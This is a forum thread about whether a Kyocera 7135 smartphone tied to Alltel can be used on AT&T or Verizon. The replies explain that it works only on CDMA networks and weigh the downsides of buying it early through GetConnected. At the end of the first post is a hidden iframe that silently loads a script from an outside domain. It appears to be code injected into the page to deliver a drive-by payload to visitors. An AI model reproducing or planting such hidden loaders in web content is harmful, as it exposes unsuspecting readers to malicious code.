+ Reply to Thread

How to get non 7135 carrier

Hey there - I'm new to the whole cell carrier concept so please be patient. I was in Fry's ready purchase the 6035 last summer when I found out they ran out and were receiving no more because the new version was coming out. I have been waiting for the 7135 ever since and have learned fantastic info on this site as to how to finegal one and switch it over to Verizon service. Is this also possible for AT&T? I currently have AT&T service and am attached to my current phone number. If I'm able to get my hands on a 7135 that's "programmed" for Alltel can it be "reprogrammed" for any other service carrier? How does this work?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm not sure, but I think AT&T is a GSM carrier, while the 7135 supports CDMA. So this would make the phone incompatible with AT&T's service.

That is correct. The 7135 will not work on AT&T.

Just called AT&T - exactly the case. So does it make sense to go and sign up for Verizon service now and then finegal the 7135 out of Alltel and program it over OR is it best to sit and wait (and wait and wait and wait) for Verizon to release the 7135 (I called and no one there has any idea when they'll have it).

You can buy the 7135 from GetConnected without the Alltel service and then stop in a VZW stores to sign up for service and have it activated. (You may also be able to do it over the phone, but it is apparently tricky if you are a new customer.) You should check out the threads on getting it from GetConnected and signing on with VZW.

What's the downside? Seems like everyone would be doing that instead of waiting . . . ?

Originally posted by steighcie
    What's the downside? Seems like everyone would be doing that instead of waiting . . . ?
    Downsides in a nutshell:
    1. VZW will not officially support the phone and will not fix it if it breaks. You will have to go through Kyocera or GetConnected, which most have reported are responsive to problems. Of course, the right VZW tech person will set you up on VZW and even admire the phone for you.

2. You will pay a higher price for the phone then you will probably have to pay with VZW, if you get it with a contract. However, many here have reported getting VZW to still give them some form of rebate on the service. Other's (myself included) were not so lucky.

3. If the rumors of the phones failing the VZW testing are true (which is why it has been supposedly delayed), the VZW phone may have firmware and/or softare upgrades that take care of the bugs. The hope here is that VZW will agree to upgrade the phones of us early adopters. If there is a hardware upgrade (less likely), we are out of luck.

There may be other downsides, but those are the ones that immediately come to mind.

There is only one upside: You get the best pda/phone on the market and can stop salivating over it while the rest of us are having a great time on the bleeding edge! I got it a month ago and only regret I didn't get it earlier.

Check out the threads on what people love (and dislike) about the phone and the whole early adopter experience. There is plenty of information on this board.